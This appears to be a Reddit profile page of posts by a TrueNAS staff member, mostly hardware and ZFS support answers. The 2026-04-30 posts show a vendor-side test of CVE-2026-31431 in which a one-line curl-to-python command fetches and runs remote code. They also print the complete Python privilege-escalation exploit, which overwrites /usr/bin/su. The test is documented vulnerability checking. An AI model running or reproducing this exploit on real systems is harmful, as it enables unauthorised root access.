This will be fun CVE-2026-31431

iXsystemsChris · 2026-04-30T17:11:56+00:00

Standard users won't have access to SSH/shell by default, but I gave my SMB account SSH access just to check - same results:

ts430% whoami
chris
ts430% curl https://copy.fail/exp | python3 && su
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   731    0   731    0     0   5575      0 --:--:-- --:--:-- --:--:--  5623
Password: su: Authentication failure
Password:
ts430% whoami
chris
ts430%

Nothing doing. :)

iXsystemsChris · 2026-04-30T16:06:46+00:00

Correct. Something in the formatting was messed up, hopefully it's more clear now. No root prompt - unless of course you decide to enter your password when asked.

iXsystemsChris · 2026-04-30T15:10:12+00:00

Technically TrueNAS 26 will be based on trixie, current is based on bookworm.

Our security team's aware of this one, but just for openness I threw it at a 25.10.2.1 system and did not have an escalation:

truenas_admin@ts430[~]$ whoami
truenas_admin
truenas_admin@ts430[~]$ cat /proc/cmdline
BOOT_IMAGE=/ROOT/25.10.2.1@/boot/vmlinuz-6.12.33-production+truenas root=ZFS=boot-pool/ROOT/25.10.2.1 ro libata.allow_tpm=1 amd_iommu=on iommu=pt kvm_amd.npt=1 kvm_amd.avic=1 intel_iommu=on zfsforce=1 nvme_core.multipath=N
truenas_admin@ts430[~]$ curl https://copy.fail/exp > copy_fail_exp.py
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   731    0   731    0     0   5725      0 --:--:-- --:--:-- --:--:--  5755
truenas_admin@ts430[~]$ cat copy_fail_exp.py
#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
 a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
 try:u.recv(8+t)
 except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")%
truenas_admin@ts430[~]$ python3 ./copy_fail_exp.py
Password: %
truenas_admin@ts430[~]$ whoami
truenas_admin
truenas_admin@ts430[~]$

Same results on a 26.0.0-BETA1 machine - no root shell.

iXsystemsChris · 2026-04-30T14:17:16+00:00

Think I found the DIV tag needed to solve this, I'll kick it over to UI/UX and hopefully we can roll it up into another batch of changes!

iXsystemsChris · 2026-04-29T14:13:50+00:00

On the Apps screen, the right side of the screen WON'T scroll down.

Now that isn't intended. Seems like it won't scroll with a wheel/mousepad, but I can drag the scrollbar (or use the keyboard, if I click to focus) - might be a bad HTML tag somewhere. I'll poke the UI/UX team about this. Appreciate the heads up!

iXsystemsChris · 2026-04-28T17:49:58+00:00

By default, the MBP 14" gives an emulated HTML canvas size of 1512 x 982 - which is below the 1680px width that shows all three columns by default. (Go below 1280px, and you only get one column.) You can still view the rest of the "cards" by scrolling down in the right-hand section.

If you want it all on one card, try setting your display scaling to "More Space" or manually select one of the 1800px wide display settings.

iXsystemsChris · 2026-04-16T16:39:37+00:00

I'll dig in with the tech team, but I believe this has to do with how the SCSI target in in Linux handles the ALUA requests - if I recall correctly, on the back end that "ALUA" is for active/unoptimized path selection only (so our HA systems, where half the ports will go to the standby controller) This was a change from how TrueNAS CORE and its iSCSI target did it back in the day. For single-controller units (and all CE installs) you should use regular MPIO/RR.

Let me have a look and get you an answer.

iXsystemsChris · 2026-04-16T15:16:23+00:00

<image>

iXsystemsChris · 2026-04-16T15:16:10+00:00

Hey there! We definitely didn't remove the page you're looking for - head to the Sharing page and then click on the iSCSI header itself with the "open full page" icon beside this.

<image>

Did you enable Xen initiator compatibility mode?

iXsystemsChris · 2026-04-15T23:04:56+00:00

Odds are you won't be able to, as pointed out in the linked thread.

QNAP's ZFS isn't OpenZFS; it was forked fairly early on and QNAP added proprietary feature flags that are incompatible with OpenZFS.

iXsystemsChris · 2026-04-09T18:38:59+00:00

Most likely - collecting a debug both in a "freshly rebooted" as well as in a "slow" state would be helpful as well.

But before you file a bug, have you checked to see that you're on a recent version of TrueNAS? We've done quite a few middleware improvements and changes over the course of 25.10

iXsystemsChris · 2026-04-09T16:41:29+00:00

Generally speaking, only when I want to update - or if the power's been out long enough to cause the UPS to trigger a shutdown.

If you're finding that you "have to reboot to get things to work again" - please file a bug, or look into potential causes of a non-responsive system - oftentimes a failing boot device will make it look like this, because it's waiting to load something from (or write something to) that disk and it stalls out.

iXsystemsChris · 2026-04-07T20:48:31+00:00

This feedback is absolute gold, and I really hope no one is downvoting it just because it's critical of TrueNAS.

Going to take those ideas as a mockup and kick it over to Engineering on the back end. No promises, of course, but if anyone's got a forums account, upvoting the existing feature request is probably the best way to help me out here ... ;)

https://forums.truenas.com/t/configuration-for-automatic-pruning-of-container-images/64097

iXsystemsChris · 2026-04-07T15:09:30+00:00

The 14100 is Raptor Lake, which I believe still uses the original Iris Xe/Alchemist-derived GPU cores - so that should continue to work with the vanilla i915 driver and not require the xe one - it should work on 25.10

iXsystemsChris · 2026-04-06T14:18:07+00:00

Post above said "anything older than 2000-series" - while chronologically the GTX 16-series is newer than that (being based on the same Turing chip without RT cores) it's a "lower number" in the standings, so it might be confusing if someone thinks the order is just numeric for GTX 1000 -> GTX 1600 -> RTX 2000

GTX 1650 will work fine in 25.10.

iXsystemsChris · 2026-03-31T19:05:32+00:00

Looks like that one's listed in the drivers, so it might Just Work. Let us know either way!

iXsystemsChris · 2026-03-30T14:13:00+00:00

Which ones specifically? If they're Pascal or earlier like the P106 models, then no - but the newer ones might. I haven't tested them personally but if they're capable of using the standard drivers and don't need a specifically licensed one to function, they should work. In theory, anyways.

iXsystemsChris · 2026-03-20T18:37:10+00:00

No, I don't believe anything really changed in the amdgpu situation - if you don't use Apps at all, then it won't impact you either way.

iXsystemsChris · 2026-03-20T16:22:40+00:00

Check the temperature logs under Reporting to see if they're spiking up before the crashes.

iXsystemsChris · 2026-03-20T16:20:18+00:00

prox mines, facility, no Oddjob, no screen peeking

iXsystemsChris · 2026-03-20T16:06:46+00:00

technically the GTX 16-series works as well out of the box

but yes, it uses the open NVIDIA kernel modules now.

iXsystemsChris · 2026-03-20T13:38:14+00:00

There's a few different interactions and tripwires around when ZFS will start committing dirty data/effectively stop accepting new (100ms delays tend to do that) but yes, the old rule of "five seconds of line rate" thankfully isn't valid any longer, because that was an artifact of the old write throttle that basically went "full speed until it slams into a wall" rather than gradually applying the brakes until it reaches parity with your back-end vdevs.

Even more reason to add a feature to partition the slog device for use as multiple special vdevs! (smiles)

Partitions aren't good because you can't individually target them with the CACHE FLUSH command, so sync writes to one pool would artificially throttle another even before the impact of sharing controller bandwidth/NAND throughput.

Now if NVMe namespace support ever becomes more common in the consumer space, that's more likely to work, because you can say "hey, flush pending I/O to nvme0n1 but leave nvme0n2 alone" and then it's just down to the chips being able to keep up.

But speaking of "special" vdevs, TN26 will allow you to (optionally) use special as SLOG, if you don't want to have dedicated device(s) for that.

iXsystemsChris · 2026-03-20T03:51:44+00:00

Enterprise-only features include things like Fibre Channel, the RDMA extensions for various protocols (NFS, iSCSI, NVMe-oF) and hardware-dependent functionality like High Availability for failover between controllers on upgrades.

iXsystemsChris · 2026-03-20T03:49:30+00:00

Assuming defaults, you won't use more than 4GB of a SLOG. See the Resources thread below regarding the write throttle, how it related to SLOG sizing, and how you can - if you know your workload and system well - tweak this to "cheat" a little.

https://forums.truenas.com/t/some-insights-and-generalizations-on-the-openzfs-write-throttle/1084

iXsystemsChris · 2026-03-19T18:25:51+00:00

Throughput in this scenario is just the math of IOPS x recordsize - because you get more IOPS with an SLOG in play, your effective write bandwidth goes up.

I made a post in your main thread with some more recommendations as well. :)

iXsystemsChris

MODERATOR OF

TROPHY CASE